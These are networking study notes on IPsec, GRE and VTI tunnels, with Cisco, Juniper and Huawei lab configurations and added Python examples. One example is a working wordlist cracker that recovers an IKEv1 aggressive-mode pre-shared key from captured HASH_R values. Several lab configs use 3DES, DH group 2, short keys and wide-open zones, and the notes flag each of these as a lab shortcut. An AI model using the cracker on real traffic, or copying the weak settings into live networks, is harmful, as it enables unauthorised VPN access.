=> Remote Access
IPsec VPN has two phases. Phase 1 is IKE (ISAKMP), Phase 2 is IPsec.
IKE Phase 1 negotiates the parameters remembered with the HAGLE mnemonic (Hashing, Authentication, Group, Lifetime, Encryption). Aggressive mode => 3 messages
Main mode => 6 messages
Hashing = md5, sha
Authentication = psk, rsa-sig
Group = dh1, dh2, dh5, dh14 (Diffie-Hellman group for the key exchange; groups 1, 2 and 5 are below 2048 bits and should not be used for new tunnels)
Lifetime = seconds
Encryption = aes, des, 3des (des and 3des are obsolete; use aes)
IKE Phase 2 = IPsec; its purpose is to protect the actual data.
Quick mode => 3 messages
Tunnel mode is the default IPsec mode on Cisco routers (mode tunnel in the transform set).
1- AH Transport = the AH header is inserted after the original IP header and the whole packet is authenticated (except mutable IP header fields such as TTL). Nothing is encrypted.
2- AH Tunnel = a new IP header is added and the whole packet is authenticated.
3- ESP Transport = the payload after the original IP header is encrypted; the ESP header and the encrypted payload are authenticated. The outer IP header is not covered by the integrity check.
4- ESP Tunnel = the entire original packet (including its IP header) is encrypted and authenticated, then a new IP header is added.
Crypto map: applied to an interface, it ties together
PHASE 1 MAIN MODE (or aggressive mode)
PHASE 1 PSK OR SIGNATURE
PHASE 2 TUNNEL OR TRANSPORT
IPsec consists of two protocols
1 AH (Authentication Header, IP protocol 51): integrity and origin authentication only, no encryption; it does not survive NAT because the IP header is part of what is authenticated.
2 ESP (Encapsulating Security Payload, IP protocol 50): encryption plus integrity; this is what every example below uses.
Simulation Example 1;
Crypto map directly on the outside IP addresses. If the tunnel is to have its own IP address, the cleaner way is the tunnel-interface (GRE over IPsec / VTI) configuration in the IPsec section further down.
R1;
crypto isakmp policy 1
encr 3des
authentication pre-share
group 2 (Diffie-Hellman group 2, 1024-bit MODP, for the Phase 1 key exchange; the pre-shared key itself is set with crypto isakmp key below)
hash sha
lifetime 86400
exit
crypto isakmp key 0 SIFRE address 10.0.0.2 (pre-shared key SIFRE bound to the peer address 10.0.0.2; 0 means the key is typed in plaintext. key 6 expects an already type-6 encrypted string and requires key config-key password-encryption and password encryption aes to be configured first)
crypto ipsec transform-set ALI esp-3des esp-sha-hmac
mode tunnel
!
access-list 100 permit ip 100.0.1.0 0.0.0.255 100.0.2.0 0.0.0.255
!
crypto map ALImap 1 ipsec-isakmp
set peer 10.0.0.2
set transform-set ALI
match address 100
interface Loopback0
ip address 100.0.1.1 255.255.255.0
!
interface FastEthernet0/0
ip address 10.0.0.1 255.255.255.0
crypto map ALImap
ip route 100.0.2.0 255.255.255.0 10.0.0.2
R2;
crypto isakmp policy 1
encr 3des
authentication pre-share
group 2
hash sha
lifetime 86400
exit
crypto isakmp key 0 SIFRE address 10.0.0.1
crypto ipsec transform-set ALI esp-3des esp-sha-hmac
mode tunnel
!
access-list 100 permit ip 100.0.2.0 0.0.0.255 100.0.1.0 0.0.0.255
!
crypto map ALImap 1 ipsec-isakmp
set peer 10.0.0.1
set transform-set ALI
match address 100
interface Loopback0
ip address 100.0.2.1 255.255.255.0
!
interface FastEthernet0/0
ip address 10.0.0.2 255.255.255.0
crypto map ALImap
ip route 100.0.1.0 255.255.255.0 10.0.0.1
Aggressive Mode
Aggressive mode is a Phase 1 option and is independent of tunnel/transport mode, which is a Phase 2 setting; the two only change together in this example. Aggressive mode finishes in 3 messages instead of 6, but the peer identities travel in the clear and, with pre-shared keys, HASH_R in message 2 is sent unencrypted, so anyone who captures the exchange can brute-force the PSK offline (ike-scan and similar tools do exactly this). Prefer main mode, or IKEv2, with pre-shared keys; use aggressive mode only when a peer with a dynamic address must be identified by name. Transport mode saves the extra outer IP header but can only protect traffic whose source and destination are the IPsec peers themselves; that is what the second ACL line (10.0.0.0/24 to 10.0.0.0/24) matches. For the loopback networks in the first line IOS falls back to tunnel mode.
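The attack the paragraph above warns about, as an added example that is not part of the original notes: with a pre-shared key, aggressive mode message 2 carries HASH_R in the clear, and HASH_R depends only on the PSK and on values that are also in the clear, so a captured exchange can be tested against a wordlist offline. The exchange here is constructed (fixed dummy bytes stand in for the DH values, nonces, cookies and payload bodies; the PSK SIFRE is the lab key from the configuration above); the SKEYID and HASH_R formulas are the ones from RFC 2409. In main mode HASH_R is sent encrypted under the DH-derived key, which is why main mode does not expose the PSK this way.

```python
"""Offline PSK recovery from a captured IKEv1 aggressive mode exchange (RFC 2409).

Constructed capture: nonces, DH public values, cookies and payload bodies are fixed
dummy bytes standing in for fields read from sniffed packets. Only the construction
of SKEYID and HASH_R follows the RFC.
"""
import hashlib
import hmac
from dataclasses import dataclass


@dataclass(frozen=True)
class AggressiveCapture:
    """Fields visible in the clear in aggressive mode messages 1 and 2."""
    g_xi: bytes    # initiator DH public value (message 1)
    n_i: bytes     # initiator nonce (message 1)
    cky_i: bytes   # initiator cookie
    sa_i: bytes    # body of the initiator's SA payload (message 1)
    g_xr: bytes    # responder DH public value (message 2)
    n_r: bytes     # responder nonce (message 2)
    cky_r: bytes   # responder cookie
    id_r: bytes    # body of the responder's ID payload (message 2)
    hash_r: bytes  # HASH_R, sent unencrypted in message 2


def prf(key: bytes, data: bytes) -> bytes:
    """IKEv1 prf for 'hash sha' is HMAC-SHA1."""
    return hmac.new(key, data, hashlib.sha1).digest()


def skeyid_psk(psk: bytes, n_i: bytes, n_r: bytes) -> bytes:
    """SKEYID = prf(pre-shared-key, Ni_b | Nr_b) for pre-shared key authentication."""
    return prf(psk, n_i + n_r)


def hash_r(skeyid: bytes, c: AggressiveCapture) -> bytes:
    """HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)."""
    return prf(skeyid, c.g_xr + c.g_xi + c.cky_r + c.cky_i + c.sa_i + c.id_r)


def responder_hash(psk: bytes, fields: dict) -> bytes:
    """What the responder puts into message 2; used here to build the constructed capture."""
    c = AggressiveCapture(hash_r=b"", **fields)
    return hash_r(skeyid_psk(psk, c.n_i, c.n_r), c)


def crack_psk(c: AggressiveCapture, wordlist):
    """Try each candidate PSK; the one that reproduces the sniffed HASH_R is the key."""
    for candidate in wordlist:
        guess = hash_r(skeyid_psk(candidate.encode(), c.n_i, c.n_r), c)
        if hmac.compare_digest(guess, c.hash_r):
            return candidate
    return None


# Constructed exchange: fixed dummy bytes instead of real DH values and nonces.
_FIELDS = dict(
    g_xi=b"\x11" * 128, n_i=b"\x22" * 20, cky_i=b"\x33" * 8, sa_i=b"\x00\x01\x00\x02",
    g_xr=b"\x44" * 128, n_r=b"\x55" * 20, cky_r=b"\x66" * 8, id_r=b"\x01\x00\x00\x00\x0a\x00\x00\x02",
)
CAPTURE = AggressiveCapture(hash_r=responder_hash(b"SIFRE", _FIELDS), **_FIELDS)

if __name__ == "__main__":
    print(crack_psk(CAPTURE, ["cisco", "admin", "SIFRE", "letmein"]))  # SIFRE
```

The cost of the attack is one HMAC-SHA1 per candidate, so a short dictionary word like SIFRE falls instantly; a long random PSK survives only because the wordlist never contains it.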
You need to add this configuration (shown for R1; mirror the peer address and the ACL on R2).
crypto isakmp profile ALIprofile
keyring default
self-identity address
match identity address 10.0.0.2
initiate mode aggressive
crypto ipsec transform-set ALI esp-3des esp-sha-hmac
mode transport
crypto map ALImap 1 ipsec-isakmp
set isakmp-profile ALIprofile
access-list 100 permit ip 100.0.1.0 0.0.0.255 100.0.2.0 0.0.0.255
access-list 100 permit ip 10.0.0.0 0.0.0.255 10.0.0.0 0.0.0.255
Nat Exemption
100.0.1.1 is the inside address on R1 and NAT is configured so the inside network can reach the internet. On IOS, inside-to-outside NAT is applied before IPsec encryption, so VPN traffic must be excluded from NAT with a deny entry in the NAT ACL; otherwise the translated source address no longer matches the crypto ACL and the packet leaves the router unencrypted. The deny entries must cover everything the crypto ACL (access-list 100) matches.
R1;
ip access-list extended natolacaklar
deny ip host 100.0.1.1 host 100.0.2.1 (exempts the VPN traffic from NAT; widen it to deny ip 100.0.1.0 0.0.0.255 100.0.2.0 0.0.0.255 so that it covers the whole of access-list 100)
permit ip 100.0.1.0 0.0.0.255 any (everything else from the inside network is translated; without a permit line nothing is NATted at all)
interface lo 0
ip nat inside
interface fa0/0
ip nat outside
ip nat pool natpool 10.0.0.10 10.0.0.20 prefix-length 24
ip nat inside source list natolacaklar pool natpool
Everything else is the same as the R1 and R2 configuration above.
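A small audit of the crypto-map example and the NAT exemption above, as an added example that is not part of the original notes. It parses IOS-style configuration text (constructed here from the R1 and R2 lines above, with only the lines the checks need), flags the weak Phase 1 and Phase 2 settings a reviewer would object to, verifies that the crypto ACLs are mirror images of each other, and checks that every crypto-ACL entry is covered by a deny in the NAT ACL. The third check is what shows that the host-level deny in natolacaklar does not cover the /24 entries in access-list 100; NAT_FIXED is the corrected ACL for comparison. Only "permit|deny ip SRC DST" entries with contiguous wildcards are handled.

```python
"""Audit crypto-map configs: weak IKE/IPsec settings, mirrored crypto ACLs, NAT exemption.
Added example; the configs are constructed from the R1/R2 lab above, the checks are not a vendor tool."""
import ipaddress

WEAK_ENCR = {"des", "3des", "esp-des", "esp-3des"}
WEAK_HASH = {"md5", "esp-md5-hmac"}
WEAK_DH = {"1", "2", "5"}        # MODP groups below 2048 bits; group 14 is the floor today


def parse_addr(tok, i):
    """Read one IOS ACL address at tok[i]: 'any', 'host X' or 'X wildcard'. Returns (network, next index)."""
    if tok[i] == "any":
        return ipaddress.ip_network("0.0.0.0/0"), i + 1
    if tok[i] == "host":
        return ipaddress.ip_network(tok[i + 1] + "/32"), i + 2
    wildcard = int(ipaddress.ip_address(tok[i + 1]))          # contiguous wildcard -> prefix length
    return ipaddress.ip_network(f"{tok[i]}/{32 - wildcard.bit_length()}", strict=False), i + 2


def parse_acls(config):
    """{acl name: [(action, src, dst), ...]} for numbered and named extended IP ACLs."""
    acls, current = {}, None
    for line in config.splitlines():
        tok = line.split()
        if not tok:
            continue
        if tok[:2] == ["ip", "access-list"]:             # named ACL header; its entries follow
            current = tok[3]
            acls.setdefault(current, [])
            continue
        if tok[0] == "access-list":                      # numbered ACL: one self-contained entry per line
            name, tok = tok[1], tok[2:]
        elif tok[0] in ("permit", "deny") and current:
            name = current
        else:
            current = None                               # any other command ends the named ACL
            continue
        if tok[1] == "ip":                               # only "permit|deny ip SRC DST" is handled
            src, i = parse_addr(tok, 2)
            dst, _ = parse_addr(tok, i)
            acls.setdefault(name, []).append((tok[0], src, dst))
    return acls


def audit_crypto(config):
    """Findings about the IKE policy, the transform set, the pre-shared key and aggressive mode."""
    findings = []
    for line in config.splitlines():
        tok = line.split()
        if not tok:
            continue
        if tok[0] in ("encr", "encryption", "hash") and tok[1] in WEAK_ENCR | WEAK_HASH:
            findings.append(f"weak IKE parameter: {line.strip()}")
        elif tok[0] == "group" and tok[1] in WEAK_DH:
            findings.append(f"weak IKE parameter: {line.strip()}")
        elif tok[:3] == ["crypto", "ipsec", "transform-set"]:
            findings += [f"weak transform {alg} in {tok[3]}" for alg in tok[4:] if alg in WEAK_ENCR | WEAK_HASH]
        elif tok[:3] == ["crypto", "isakmp", "key"]:
            if tok[3] == "6":
                findings.append("'key 6' expects an already type-6 encrypted string; use 'key 0' to type a plaintext key")
            elif len(tok[4] if tok[3] == "0" else tok[3]) < 16:
                findings.append("pre-shared key shorter than 16 characters")
        elif tok[:3] == ["initiate", "mode", "aggressive"]:
            findings.append("aggressive mode exposes HASH_R to offline PSK cracking")
    return findings


def mirror_check(local_acl, remote_acl):
    """Each local crypto-ACL permit must exist on the peer with source and destination swapped; returns the unmatched ones."""
    remote = {(s, d) for a, s, d in remote_acl if a == "permit"}
    return [(s, d) for a, s, d in local_acl if a == "permit" and (d, s) not in remote]


def nat_exemption_check(crypto_acl, nat_acl):
    """Crypto-ACL permits not fully covered by a deny in the NAT ACL: those flows get translated and miss the crypto ACL."""
    denies = [(s, d) for a, s, d in nat_acl if a == "deny"]
    return [(s, d) for a, s, d in crypto_acl if a == "permit"
            and not any(s.subnet_of(ds) and d.subnet_of(dd) for ds, dd in denies)]


# Constructed from the R1 / R2 example above (only the lines the checks look at).
R1_CONFIG = """
crypto isakmp policy 1
 encr 3des
 authentication pre-share
 group 2
 hash sha
 lifetime 86400
crypto isakmp key 0 SIFRE address 10.0.0.2
crypto ipsec transform-set ALI esp-3des esp-sha-hmac
access-list 100 permit ip 100.0.1.0 0.0.0.255 100.0.2.0 0.0.0.255
ip access-list extended natolacaklar
 deny ip host 100.0.1.1 host 100.0.2.1
 permit ip 100.0.1.0 0.0.0.255 any
"""
R2_CONFIG = """
access-list 100 permit ip 100.0.2.0 0.0.0.255 100.0.1.0 0.0.0.255
"""
# NAT ACL whose deny mirrors the crypto ACL, for comparison.
NAT_FIXED = """
ip access-list extended natolacaklar
 deny ip 100.0.1.0 0.0.0.255 100.0.2.0 0.0.0.255
 permit ip 100.0.1.0 0.0.0.255 any
"""

if __name__ == "__main__":
    r1, r2 = parse_acls(R1_CONFIG), parse_acls(R2_CONFIG)
    print(audit_crypto(R1_CONFIG))
    print("unmirrored:", mirror_check(r1["100"], r2["100"]))
    print("not NAT-exempt:", nat_exemption_check(r1["100"], r1["natolacaklar"]))
    print("with fixed NAT ACL:", nat_exemption_check(r1["100"], parse_acls(NAT_FIXED)["natolacaklar"]))
```

Run against the two lab routers it reports 3DES, DH group 2, the 5-character key and the one crypto-ACL entry that the host-level NAT deny does not cover; the mirror check passes because R2's access-list 100 is the exact reverse of R1's.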
RSA Signature Authentication (Rivest-Shamir-Adleman): each router enrolls with a CA running on R1 and authenticates Phase 1 with its certificate instead of a pre-shared key, so no secret has to be shared between the routers.
Step 1, time sync (certificates carry validity dates, so the CA and the routers must agree on the time before enrollment):
R1;
ntp master
R2,R3;
ntp server 10.0.0.1
Step 2, the CA on R1 and enrollment of R2 and R3:
R1;
ip http server (SCEP enrollment uses HTTP on port 80)
crypto pki server ALIca
hash sha256 (use sha1 only on an IOS that lacks sha256; SHA-1 signatures are rejected by most modern clients)
grant auto (every enrollment request is signed automatically. Fine for a lab; in production grant manually or require an enrollment password, because anyone who can reach the SCEP URL otherwise gets a certificate and with it VPN access)
no shutdown (you are prompted for a passphrase, for example Aliihsan123, that protects the CA private key)
R2,R3 (shown for R2; substitute R3 where noted)
ip domain-name ali.local
crypto key generate rsa general-keys modulus 2048 (1024-bit RSA is below current minimums)
crypto pki trustpoint ALIca
enrollment url http://10.0.0.1:80
subject-name CN=R2 (CN=R3 at R3: the subject is the router's own name; the FQDN R2.ali.local is added to the certificate automatically)
revocation-check none
rsakeypair R2.ali.local (R3.ali.local at R3)
crypto pki authentication ALIca (answer yes only after comparing the fingerprint shown with the CA certificate fingerprint on R1, show crypto pki certificates; otherwise a rogue CA could be accepted)
crypto pki enroll ALIca (n, n, y)
That is it for PKI; now the IPsec VPN configuration (R2 shown, swap the names at R3):
crypto isakmp policy 1
encr 3des
authentication rsa-sig
group 2
hash sha
lifetime 86400
exit
crypto identity R3 (write R2 at R3; this names the peer and is matched against the peer's certificate)
fqdn R3.ali.local (write R2.ali.local at R3)
access-list 100 permit ip host 100.0.2.1 host 100.0.3.1 (at R3: access-list 100 permit ip host 100.0.3.1 host 100.0.2.1)
crypto ipsec transform-set ALI esp-3des esp-sha-hmac
crypto map ALImap 1 ipsec-isakmp
set peer 10.0.0.3 (10.0.0.2 at R3)
set transform-set ALI
set identity R3 (R2 at R3: the peer's certificate must carry the FQDN given in crypto identity R3, otherwise Phase 1 fails)
match address 100
interface fa0/0
crypto map ALImap
You can check with these commands: show crypto isakmp sa (Phase 1 SA, should show QM_IDLE / ACTIVE), show crypto ipsec sa (Phase 2 SAs with the #pkts encrypt/decrypt counters), show crypto session, and for the certificates show crypto pki certificates.
Crypto maps are the legacy approach. The tunnel-interface methods that follow (GRE over IPsec, VTI, DMVPN) are preferred for new designs because a routing protocol can run over the tunnel instead of maintaining crypto ACLs.
GRE Generic Routing Encapsulation
GRE works as an encapsulation protocol. It takes a finished IP packet (data that already has its IP header) and wraps it with a GRE header and a new outer IP header. The outer IP header does not carry the packet's final destination; it carries the addresses of the two GRE tunnel endpoints. Layer 3 devices along the path route on the outer addresses, i.e. the tunnel endpoints, and never look at the inner addresses. When the packet reaches the far end of the tunnel, the GRE encapsulation is removed and the packet is routed on its own source and destination addresses.
GRE protocol number is 47
EIGRP protocol number is 88
OSPF protocol number is 89
ICMP protocol number is 1
If you want to run a dynamic routing protocol (OSPF, RIP, EIGRP) between the sites, the routers must look directly connected: hello packets are sent with TTL 1 and to link-local multicast addresses, so they are never forwarded across the provider network. The GRE tunnel provides that directly connected link, and the adjacency forms over the tunnel IP addresses.
GRE itself has no encryption and no authentication: anyone on the path can read and modify the inner packet, and only the optional GRE key (a cleartext tunnel identifier) separates tunnels. Encrypt it with IPsec as shown below.
R2:
interface Tunnel0
ip address 3.3.3.1 255.255.255.252
tunnel source 192.168.1.2
tunnel destination 192.168.2.2
!
interface Loopback0
ip address 1.1.1.1 255.255.255.255
!
interface FastEthernet0/0
ip address 192.168.1.2 255.255.255.0
!
router eigrp 100
network 1.1.1.1
network 3.3.3.1
!
ip route 2.2.2.2 255.255.255.255 3.3.3.2 (static route over the tunnel; EIGRP learns this anyway)
ip route 192.168.2.2 255.255.255.255 192.168.1.1 (the route to the tunnel destination must point out the physical interface, never through the tunnel, otherwise recursive routing brings the tunnel down)
R3;
interface Tunnel0
ip address 3.3.3.2 255.255.255.252
tunnel source 192.168.2.2
tunnel destination 192.168.1.2
!
interface Loopback0
ip address 2.2.2.2 255.255.255.255
!
interface FastEthernet1/0
ip address 192.168.2.2 255.255.255.0
!
router eigrp 100
network 2.2.2.2
network 3.3.3.2
!
ip route 1.1.1.1 255.255.255.255 3.3.3.1
ip route 192.168.1.2 255.255.255.255 192.168.2.1
If you want to encrypt the data: IPsec over the GRE tunnel
The IKE peers are the physical (tunnel source/destination) addresses; the encryption is attached to the tunnel interface with an IPsec profile, so no crypto ACL is needed and the routing protocol keeps running over the tunnel.
R2;
crypto isakmp policy 1
hash sha
encr 3des
authentication pre-share
group 2
lifetime 86400
crypto isakmp key 0 SIFRE address 192.168.2.2
crypto ipsec transform-set ALI esp-3des esp-sha-hmac
mode tunnel (transport mode is also enough here, because the GRE packet already carries the tunnel endpoints as its IP addresses, and it saves 20 bytes per packet)
!
crypto ipsec profile ALIipsecprofile
set transform-set ALI
!
interface tunnel 0
tunnel protection ipsec profile ALIipsecprofile
R3;
crypto isakmp policy 1
hash sha
encr 3des
authentication pre-share
group 2
lifetime 86400
crypto isakmp key 0 SIFRE address 192.168.1.2
crypto ipsec transform-set ALI esp-3des esp-sha-hmac
!
crypto ipsec profile ALIipsecprofile
set transform-set ALI
interface tunnel 0
tunnel protection ipsec profile ALIipsecprofile
JUNIPER Gre Configuration
R1;
set interfaces gr-0/0/0 unit 0 family inet address 6.6.6.1/30
set interfaces gr-0/0/0 unit 0 tunnel source 78.106.136.123
set interfaces gr-0/0/0 unit 0 tunnel destination 94.155.104.78
set protocols ospf area 0.0.0.34 interface gr-0/0/0 metric 10
set security zones security-zone WAN host-inbound-traffic system-services all
set security zones security-zone WAN host-inbound-traffic protocols all
set security zones security-zone WAN interfaces gr-0/0/0
R2
set interfaces gr-0/0/0 unit 0 family inet address 6.6.6.2/30
set interfaces gr-0/0/0 unit 0 tunnel source 94.155.104.78
set interfaces gr-0/0/0 unit 0 tunnel destination 78.106.136.123
set protocols ospf area 0.0.0.34 interface gr-0/0/0 metric 10
set security zones security-zone WAN host-inbound-traffic system-services all
set security zones security-zone WAN host-inbound-traffic protocols all
set security zones security-zone WAN interfaces gr-0/0/0
("all" opens every management service and every routing protocol on the zone, which is too much for an internet-facing zone; for this tunnel, host-inbound-traffic system-services ping and protocols ospf are enough. Remember that GRE is unencrypted: the OSPF adjacency and all user traffic cross the internet in the clear.)
Huawei GRE (two OSPF processes: process 2 provides underlay reachability between the tunnel endpoints, process 1 runs over the tunnel; keeping them separate stops the tunnel destination from being learned through the tunnel itself)
[R1]interface Tunnel 0/0/1
[R1-Tunnel0/0/1]ip address 100.1.1.1 24
[R1-Tunnel0/0/1]tunnel-protocol gre
[R1-Tunnel0/0/1]source 10.0.12.1
[R1-Tunnel0/0/1]destination 10.0.23.3
[R3]interface Tunnel 0/0/1
[R3-Tunnel0/0/1]ip address 100.1.1.2 24
[R3-Tunnel0/0/1]tunnel-protocol gre
[R3-Tunnel0/0/1]source 10.0.23.3
[R3-Tunnel0/0/1]destination 10.0.12.1
[R1]ospf 1
[R1-ospf-1]area 0
[R1-ospf-1-area-0.0.0.0]network 100.1.1.0 0.0.0.255
[R1]ospf 2 router-id 10.0.1.1
[R1-ospf-2]area 0
[R1-ospf-2-area-0.0.0.0]network 10.0.12.0 0.0.0.255
[R3]ospf 1
[R3-ospf-1]area 0
[R3-ospf-1-area-0.0.0.0]network 100.1.1.0 0.0.0.255
[R3]ospf 2 router-id 10.0.3.3
[R3-ospf-2]area 0
[R3-ospf-2-area-0.0.0.0]network 10.0.23.0 0.0.0.255
VTI (Virtual Tunnel Interface)
VTI supports dynamic routing protocols, like GRE, because it is a routed interface with tunnel protection; unlike a crypto map it needs no crypto ACL.
GRE adds a 4-byte GRE header in front of the inner packet (plus the outer IP header). An IPsec VTI carries the inner packet directly inside ESP, so the GRE header is not needed.
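A worked overhead calculation for the encapsulations compared here and for the IPsec modes listed at the top of the page, as an added example that is not part of the original notes. It computes the on-the-wire size of an inner packet after GRE, after a crypto map or VTI in tunnel mode, and after GRE over IPsec in transport or tunnel mode, and from that the largest inner packet that still fits a 1500-byte link, i.e. the value to put in ip mtu (the 1400 and 1384 used later on this page are comfortably below it). Assumptions: 3DES-CBC with HMAC-SHA1-96 as in the transform set ALI (8-byte IV and block, 12-byte ICV), GRE without key or checksum options, and no NAT-T UDP header; header sizes are from the RFCs.

```python
"""Encapsulation overhead and usable inner MTU for the tunnel types on this page.
Added example, not from the original notes; header sizes are from the RFCs
(GRE 4 bytes without options, ESP header 8, trailer 2, IV and ICV per algorithm)."""

IP_HDR, GRE_HDR, ESP_HDR, ESP_TRAILER = 20, 4, 8, 2
CIPHER = {"esp-3des": (8, 8), "esp-aes": (16, 16), "esp-aes-256": (16, 16)}  # (IV bytes, block size)
AUTH = {"esp-md5-hmac": 12, "esp-sha-hmac": 12, "esp-sha256-hmac": 16}        # ICV bytes (truncated HMAC)


def esp_overhead(packet_len, cipher, auth, mode):
    """Bytes ESP adds to an IP packet of packet_len bytes in 'tunnel' or 'transport' mode."""
    iv, block = CIPHER[cipher]
    # Tunnel mode encrypts the whole inner packet; transport mode only what follows the IP header.
    protected = packet_len + ESP_TRAILER if mode == "tunnel" else packet_len - IP_HDR + ESP_TRAILER
    padding = (-protected) % block                  # CBC: pad (payload + trailer) up to the block size
    outer = IP_HDR if mode == "tunnel" else 0       # tunnel mode adds a new outer IP header
    return ESP_HDR + iv + padding + ESP_TRAILER + AUTH[auth] + outer


def encapsulated_size(packet_len, encap, cipher="esp-3des", auth="esp-sha-hmac"):
    """Size on the wire of an inner packet after one of:
    gre, ipsec-tunnel (crypto map in tunnel mode or a VTI), gre-ipsec-transport, gre-ipsec-tunnel."""
    if encap == "gre":
        return packet_len + GRE_HDR + IP_HDR
    if encap == "ipsec-tunnel":
        return packet_len + esp_overhead(packet_len, cipher, auth, "tunnel")
    gre = packet_len + GRE_HDR + IP_HDR             # GRE first, then IPsec protects the GRE packet
    mode = "transport" if encap == "gre-ipsec-transport" else "tunnel"
    return gre + esp_overhead(gre, cipher, auth, mode)


def largest_inner_packet(link_mtu, encap, cipher="esp-3des", auth="esp-sha-hmac"):
    """Largest inner IP packet that still fits link_mtu after encapsulation: the value for 'ip mtu'."""
    size = link_mtu
    while encapsulated_size(size, encap, cipher, auth) > link_mtu:
        size -= 1
    return size


def tcp_mss(ip_mtu):
    """'ip tcp adjust-mss' value for a tunnel MTU: subtract 20 bytes IP and 20 bytes TCP header."""
    return ip_mtu - 40


if __name__ == "__main__":
    for encap in ("gre", "ipsec-tunnel", "gre-ipsec-transport", "gre-ipsec-tunnel"):
        mtu = largest_inner_packet(1500, encap)
        print(f"{encap:22} ip mtu {mtu}  tcp adjust-mss {tcp_mss(mtu)}")
```

With 3DES/SHA-1 on a 1500-byte link the results are 1476 for plain GRE, 1446 for a VTI, 1442 for GRE over IPsec in transport mode and 1422 in tunnel mode: the VTI wins exactly the 4 GRE bytes over transport-mode GRE/IPsec, and tunnel-mode GRE/IPsec pays a second 20-byte IP header. Because CBC padding depends on the packet length, the overhead is not a constant, which is why the function searches downward instead of subtracting a fixed number.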
R2;
crypto isakmp policy 1
encr 3des
authentication pre-share
group 2
hash sha
lifetime 86400
crypto isakmp key 0 SIFRE address 10.0.0.2
crypto ipsec transform-set ALI esp-3des esp-sha-hmac
crypto ipsec profile TEST
set transform-set ALI
interface Tunnel0
ip address 100.0.1.1 255.255.255.252
tunnel source 10.0.0.1
tunnel destination 10.0.0.2
tunnel mode ipsec ipv4
tunnel protection ipsec profile TEST
!
interface FastEthernet0/0
ip address 10.0.0.1 255.255.255.0
no shut
ip route 192.168.1.0 255.255.255.0 100.0.1.2
R3;
crypto isakmp policy 1
encr 3des
authentication pre-share
group 2
hash sha
lifetime 86400
crypto isakmp key 0 SIFRE address 10.0.0.1
crypto ipsec transform-set ALI esp-3des esp-sha-hmac
crypto ipsec profile TEST
set transform-set ALI
interface Tunnel1
ip address 100.0.1.2 255.255.255.252
tunnel source 10.0.0.2
tunnel destination 10.0.0.1
tunnel mode ipsec ipv4
tunnel protection ipsec profile TEST
!
interface FastEthernet0/0
ip address 10.0.0.2 255.255.255.0
no shut
interface FastEthernet2/0
ip address 192.168.1.1 255.255.255.0
no shut
R1;
interface FastEthernet0/0
ip address 192.168.1.2 255.255.255.0
no shut
ip route 0.0.0.0 0.0.0.0 192.168.1.1
Juniper to Cisco VTI Tunnel Configuration
Cisco;
interface GigabitEthernet 0/0/0
ip address 213.168.222.2 255.255.255.0 (outside IP)
no shut
exit
interface GigabitEthernet 1/0/1
ip address 192.168.224.1 255.255.255.0 (inside IP)
no shut
crypto isakmp policy 1
encryption 3des
hash sha
authentication pre-share
group 2
exit
crypto isakmp key Juniperpassword address 213.168.0.1 (Juniperpassword is whatever key you choose; 213.168.0.1 is the Juniper outside IP)
crypto isakmp profile Juniper
keyring default
match identity address 4.4.4.1 (the Juniper identifies itself with its st0 address 4.4.4.1, not with its outside address, so the profile must match that identity)
initiate mode aggressive
crypto ipsec transform-set vpnjunos esp-3des esp-sha-hmac
exit
crypto ipsec profile VTI
set transform-set vpnjunos
set isakmp-profile Juniper (binds the ISAKMP profile to this tunnel so that its aggressive-mode and identity settings apply when the router initiates)
exit
int tunnel 1
ip address 4.4.4.2 255.255.255.0
ip mtu 1384 (set it explicitly and match the Juniper st0 MTU; with the default MTU large packets are fragmented after encryption or silently dropped. ip tcp adjust-mss 1344 on the same interface avoids the problem for TCP)
tunnel source 213.168.222.2
tunnel destination 213.168.0.1
tunnel mode ipsec ipv4
tunnel protection ipsec profile VTI
exit
ip route 10.3.3.0 255.255.255.0 4.4.4.1 (the LAN behind the Juniper is reached through the tunnel next hop 4.4.4.1)
Juniper;
set interfaces ge-0/0/0 unit 0 description SRX1
set interfaces ge-0/0/0 unit 0 family inet address 213.168.0.1/24
set interfaces ge-0/0/1 unit 0 family inet address 10.3.3.1/24
set interfaces st0 unit 0 description VPN-AKM
set interfaces st0 unit 0 family inet mtu 1384
set interfaces st0 unit 0 family inet address 4.4.4.1/24
set security ike proposal VPNtoVPN authentication-method pre-shared-keys
set security ike proposal VPNtoVPN dh-group group2
set security ike proposal VPNtoVPN authentication-algorithm sha1
set security ike proposal VPNtoVPN encryption-algorithm 3des-cbc
set security ike policy VPN mode aggressive
set security ike policy VPN proposals VPNtoVPN
set security ike policy VPN pre-shared-key ascii-text Juniperpassword
set security ike gateway VPNAKM ike-policy VPN
set security ike gateway VPNAKM address 213.168.222.2 (the Cisco outside IP)
set security ike gateway VPNAKM local-identity inet 4.4.4.1
set security ike gateway VPNAKM external-interface ge-0/0/0.0
set security ipsec proposal VPN protocol esp
set security ipsec proposal VPN authentication-algorithm hmac-sha1-96
set security ipsec proposal VPN encryption-algorithm 3des-cbc
set security ipsec policy VPN proposals VPN
set security ipsec vpn VPNVPN bind-interface st0.0
set security ipsec vpn VPNVPN ike gateway VPNAKM
set security ipsec vpn VPNVPN ike ipsec-policy VPN
set security ipsec vpn VPNVPN establish-tunnels immediately
set security zones security-zone SRX1 host-inbound-traffic system-services all
set security zones security-zone SRX1 host-inbound-traffic protocols all
set security zones security-zone SRX1 interfaces ge-0/0/0
set security zones security-zone SRX1 interfaces ge-0/0/1
set security zones security-zone SRX1 interfaces st0.0
set security policies from-zone SRX1 to-zone SRX1 policy INT match source-address any
set security policies from-zone SRX1 to-zone SRX1 policy INT match destination-address any
set security policies from-zone SRX1 to-zone SRX1 policy INT match application any
set security policies from-zone SRX1 to-zone SRX1 policy INT then permit
set routing-options static route 192.168.224.0/24 next-hop 4.4.4.2
(Lab shortcut: the outside interface, the LAN and st0.0 all sit in one zone with every service allowed inbound and an any/any intrazone policy, so every management service of the SRX is reachable from the internet. In production put ge-0/0/0 in an untrust zone that allows only host-inbound-traffic system-services ike, keep the LAN and st0.0 in separate zones, and write explicit from-zone/to-zone policies for the VPN traffic.)
Site to Site Vpn at Juniper Devices
R1;
set security ike policy ido-gkm mode main
set security ike policy ido-gkm proposal-set standard
set security ike policy ido-gkm pre-shared-key ascii-text Juniper
set security ike gateway ido-gkm ike-policy ido-gkm
set security ike gateway ido-gkm address 85.105.212.100
set security ike gateway ido-gkm external-interface pp0.0
set security ipsec policy ido-gkm proposal-set standard
set security ipsec vpn ido-gkm bind-interface st0.14
set security ipsec vpn ido-gkm vpn-monitor optimized
set security ipsec vpn ido-gkm ike gateway ido-gkm
